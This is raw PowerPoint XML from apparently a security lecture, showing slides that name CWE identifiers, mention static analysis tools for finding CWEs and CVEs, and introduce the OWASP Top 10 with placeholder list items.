        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8019CE4-DC33-14AC-EACA-1AD4B001E63E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372365" y="1955330"/>
            <a:ext cx="1184940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CWE-502</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72BD86E-1CC1-55DA-2C43-480E7219E49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359853" y="3099773"/>
            <a:ext cx="1184940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CWE-400</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAFE7F0-483E-F960-419F-65FA602B791A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359853" y="4324590"/>
            <a:ext cx="1056700" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CWE-20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1338315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74A660D-BAD8-3E93-6251-66425E5A8E77}"/>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EE304A7-287F-B872-B092-C36766F08BF4}"/>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01D09CD5-CEBE-E843-6DFA-7D09971BF87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45102D8F-7055-6ADF-5D54-F77A853B0C37}"/>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23907DDD-10FA-A724-789C-E0285D355374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18DF7CE-33F3-5C7F-345C-F8E766E055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4679331-5667-10D3-4A7C-3E28E5826817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="5591955" cy="3448531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33667D4D-60A6-B556-FD0C-DE3F9229945D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404753" y="1070399"/>
            <a:ext cx="5761847" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are static analysis tools that can scan binaries for CWEs and CVEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1A78FB-B9A5-0F87-4657-92E5A0366A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4543928"/>
            <a:ext cx="6414833" cy="1765699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="Usage Example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA21E51F-582D-C4A9-7D65-04A0389AB1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539040"/>
            <a:ext cx="9372600" cy="283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19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73BE6C8-2AF8-6F1E-6A0B-11EC44E8072A}"/>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DE3B9E5-15A3-4C2F-3B71-24C66F7BF798}"/>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B41D3D4E-526A-58D6-01B3-196F5663C6A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1A673018-50F6-E302-0C7E-D2D70207E68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F44126ED-451B-8A4A-37D7-CD2B075AD347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77146757-DBEE-E78E-79C1-EC82C4C4AC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2C84E325-3A8C-BAB1-66A5-B86277606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33400"/>
            <a:ext cx="9610725" cy="5121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B52D488-A37B-64B0-B3F5-794B6DE0971A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4152900"/>
            <a:ext cx="5181600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="7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5DBEB70-D928-5661-5C74-05469AB27AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4171950"/>
            <a:ext cx="3631122" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;EvilPl4yer&gt; Hello world!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="545454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706EE36-2AE5-6D0D-22B5-A692EE0F68F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E8FAF84-13A8-7C5F-055C-3D83AF941205}"/>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CF4179AF-C92C-02CB-12AD-52E4B4880A3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1B57C940-D2C5-8A37-F13E-7C151F8EA8A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8D372711-E214-3649-7EF9-D6AB62F398F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC095ECE-1530-5F83-3E22-FCA5663FF0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E0E4CEA-B39A-BCB8-B4AD-8810657FFD82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="152400"/>
            <a:ext cx="5591955" cy="3448531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387CD433-945E-8C28-859A-C913A8FAC4B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685799" y="3600931"/>
            <a:ext cx="5761847" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are static analysis tools that can scan binaries for CWEs and CVEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{746BCBD4-206F-C74F-AE6A-F73D8E5B0E75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4543928"/>
            <a:ext cx="6414833" cy="1765699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D517FB60-47FD-A0B6-560B-B888728A9015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5807855" y="342926"/>
            <a:ext cx="5249008" cy="1533739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{177035C1-BCB4-9AE2-4811-84EF85427277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076457" y="1886714"/>
            <a:ext cx="4429743" cy="2029108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B0BD0C-E36B-BDF7-C08A-7BC9EA8DD148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855071" y="2850810"/>
            <a:ext cx="5154575" cy="1765699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1218A0B-FCAA-C00F-29B1-574AFBC86E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4118996"/>
            <a:ext cx="5248735" cy="2150257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="994081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DDEF1E7-C2F7-9A13-B582-2E08BE8377E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565ED08-5E84-7E52-5CF3-E65D0182364D}"/>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41041428-9EE2-CBAD-B176-1241A71F95D8}"/>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2F1E8EA2-51A3-3723-416D-84791C15929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8A198825-72E8-6F0C-86B9-C29CA9ED1BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F434B957-F810-24A7-6CFB-DC07D050E2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97BC65-86C7-DDB7-08DB-6CA8414AD1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="304800"/>
            <a:ext cx="8915400" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The Open Web Application Security Project (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) is an organization that maintains a regularly-updated list of the top 10 most critical web applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2" descr="What is OWASP? A standard bearer for better web application security | CSO  Online">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08DA2324-46C0-A6FF-EBD8-713A1B2A38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6748" y="304800"/>
            <a:ext cx="2835852" cy="10039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6CB823-6C70-900F-1208-9519565A1664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1774815"/>
            <a:ext cx="8084264" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633645AE-8BC4-68E6-3F23-2BD05E3E15C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2849404"/>
            <a:ext cx="7467600" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>They gather web apps from industry and open-source projects, and then find the most common vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220624C2-249A-66A0-3415-0AE9176AF3DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4910080"/>
            <a:ext cx="8382000" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>As a developer, it is recommended that you review the OWASP Top 10 when they are released</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15364" name="Picture 4" descr="Order Warning Signs for Workplace Safety">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C29585-3337-E71E-FFBD-A2998B1AC5F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154" t="13077" r="6923" b="10667"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8755950" y="4756330"/>
            <a:ext cx="1329898" cy="119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93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006AF17-B619-C2D2-0F9D-C4B804EF3B5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47476DB5-D780-8AD8-6AFB-F991D8CE1D9C}"/>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3DFD3CC7-9195-2EA4-FC7B-0BC31C8D730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57F7BF1D-D340-6573-CB2F-E0AA17FFE11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B9FB0FE9-E178-86EF-A53C-F4AD8410917A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58540672-95B7-9BBE-E628-5214A71EAA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D078478-B992-CC4C-DB13-D3DD385291B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4351657" y="20320"/>
            <a:ext cx="3183885" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Rockwell Extra Bold" panose="02060903040505020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E25641-F2B1-633F-C28A-56DAD5C73D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="701689"/>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1. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8802BF83-591B-58CE-DC26-4454D3FA2E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1834549"/>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3. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2447EFDC-B083-4FE8-7E38-28F58E78E10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2967409"/>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5. ???</a:t>
            </a:r>
          </a:p>
